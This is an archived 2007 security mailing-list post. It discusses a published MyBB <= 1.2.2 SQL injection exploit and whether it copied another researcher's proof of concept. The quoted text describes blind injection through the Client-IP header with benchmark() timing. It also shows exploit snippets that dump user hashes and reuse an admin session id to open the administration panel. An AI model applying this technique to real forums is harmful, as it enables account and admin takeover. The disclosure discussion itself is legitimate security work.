[VIM] Milw0rm 3719 (Mybb <= 1.2.2)
str0ke
str0ke at milw0rm.com
Thu Apr 12 17:51:58 UTC 2007
It was posted to go along with his paper that went up today. Guessing
he just wanted to show an example of it in action.
http://www.milw0rm.com/papers/149
/str0ke
On 4/12/07, GM darkfig <gmdarkfig at gmail.com> wrote:
> The guy use the same vulnerability I found
> (http://acid-root.new.fr/poc/28070403.txt).
> He use the same method (benchmark(), Client-IP, DELETE from
> prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's
> just the perl version. He use the solution number 1 I said in my
> exploit:
>
> # SOLUTION NUMBER 1
> # mysql> select * from mybb_users\G
> # *************************** 1. row ***************************
> # uid: 1
> # username: root
> # password: 39ac8681f5cf4fcd9c9c09719a618bd3
> # salt: BFeJBOCF
> # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
> #
> # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration
> Control Panel...
> #
> # SOLUTION NUMBER 2
> # mysql> select * from mybb_adminsessions\G
> # *************************** 1. row ***************************
> # sid: 81e267263b9254f3aaf670383bfbfec9
> # uid: 1
> # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
> # ip: 127.0.0.1
> # dateline: 1175443967
> # lastactive: 1175444369
> #
> # $xpl->addheader('Client-IP','127.0.0.1');
> # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
> # print $xpl->getcontent(); // ...Welcome to the MyBB Administration
> Control Panel...
> #
> # I decided to use the solution number 2.
>
More information about the VIM
mailing list